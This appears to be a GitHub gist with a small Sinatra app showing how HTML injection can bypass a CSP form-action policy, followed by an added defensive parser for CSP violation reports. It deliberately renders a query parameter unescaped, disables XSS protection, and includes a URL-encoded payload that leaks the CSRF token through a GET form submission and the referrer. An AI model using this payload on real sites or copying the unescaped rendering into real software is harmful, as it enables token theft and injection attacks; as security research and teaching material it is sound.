@kazu69
Last active September 12, 2016 16:09
Bypass CSP form-action XSS example

try

```sh
bundle install
bundle exec ruby app.rb
```

```text
[2016-09-10 00:01:46] INFO  WEBrick 1.3.1
[2016-09-10 00:01:46] INFO  ruby 2.2.2 (2015-04-13) [x86_64-darwin15]
== Sinatra (v1.4.7) has taken the stage on 4567 for development with backup from WEBrick
[2016-09-10 00:01:46] INFO  WEBrick::HTTPServer#start: pid=26211 port=4567
```

```sh
open http://localhost:4567
```
| route | content |
|---|---|
| GET / | Bypass CSP form-action XSS example |
| GET /csp_report_example/ | confirm that the CSP violation report is sent |
| GET /apper_form_value/ | HTML injection example |

more

```ruby
require 'sinatra'
require 'slim'
require 'json'

before do
  headers \
    'Content-Security-Policy' => "default-src 'self'; form-action 'self'; report-uri /csp-reports/",
    'X-XSS-Protection' => '0' # with '1' (enabled) the injection does not fire
end

get '/' do
  slim :index
end

# confirm that CSP violation reports are delivered
get '/csp_report_example/' do
  slim :csp_report_example
end

# once injected, the token is emitted into the URL query string
get '/apper_form_value/' do
  slim :apper_form_value
end

post '/subscribe/' do
  logger.info 'subscribed'
end

# destination for CSP violation reports
post '/csp-reports/' do
  report = JSON.parse request.body.read
  logger.info report
end

__END__

@@ layout
html
  == yield

@@ index
/ output without escaping
== params['xss']
form[method="POST" action="/subscribe/" id="subscribe"]
  input[type="hidden" name="csrftoken" value="randomcsrftoken"]
  input[type="submit" value="subscribe"]
br
| <a href="/?xss=%3Cinput%20value%3D%22Click%20Me%22%20type%3D%22submit%22%20formaction%3D%22%22%20form%3D%22subscribe%22%20formmethod%3D%22get%22%20%2F%3E%3Cinput%20type%3D%22hidden%22%20value%3D%22%3Cmeta%20name%3D%27referrer%27%20content%3D%27always%27%3E%22%3E">XSS</a>

@@ csp_report_example
form[method="POST" action="http://google.com/" id="subscribe"]
  input[type="hidden" name="csrftoken" value="randomcsrftoken"]
  input[type="submit" value="subscribe"]

@@ apper_form_value
| <div><form action="http://github.com/"></div>
form[method="POST" action="/subscribe/" id="subscribe"]
  input[type="hidden" name="csrftoken" value="randomcsrftoken"]
  input[type="submit" value="subscribe"]
```
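An added example, not part of the gist: a Ruby parser for the JSON a browser POSTs to the report-uri above, with a constructed sample report of the kind the /csp_report_example/ page triggers. It flags form-action violations aimed at another origin; the formaction="" trick on the index page submits to the same origin and so raises no report at all.

```ruby
require 'json'
require 'uri'

# Constructed sample of the JSON a browser POSTs to report-uri when the
# /csp_report_example/ form tries to submit to http://google.com/ under
# "form-action 'self'". Field names follow the CSP report format.
SAMPLE_REPORT = <<~JSON
  {"csp-report": {
    "document-uri": "http://localhost:4567/csp_report_example/",
    "violated-directive": "form-action",
    "effective-directive": "form-action",
    "original-policy": "default-src 'self'; form-action 'self'; report-uri /csp-reports/",
    "blocked-uri": "http://google.com"
  }}
JSON

REQUIRED_KEYS = %w[document-uri violated-directive blocked-uri].freeze

# True when blocked-uri points at a different origin than the document.
# Keyword values such as "inline" or "self" carry no host and are not foreign.
def foreign_origin?(blocked, document)
  b = URI.parse(blocked)
  return false unless b.host
  d = URI.parse(document)
  [b.scheme, b.host, b.port] != [d.scheme, d.host, d.port]
rescue URI::InvalidURIError
  true
end

# Parses one report body; returns a summary hash, or nil for malformed input.
def parse_csp_report(body)
  data = JSON.parse(body)
  report = data.is_a?(Hash) ? data['csp-report'] : nil
  return nil unless report.is_a?(Hash) && REQUIRED_KEYS.all? { |k| report.key?(k) }
  directive = (report['effective-directive'] || report['violated-directive']).to_s.split.first
  {
    document_uri: report['document-uri'],
    directive: directive,
    blocked_uri: report['blocked-uri'],
    foreign_origin: foreign_origin?(report['blocked-uri'].to_s, report['document-uri'].to_s)
  }
rescue JSON::ParserError
  nil
end

# Flags a form-action violation whose target is off-origin, i.e. a form
# that was about to carry its fields (such as csrftoken) to another site.
def alert?(summary)
  !summary.nil? && summary[:directive] == 'form-action' && summary[:foreign_origin]
end
```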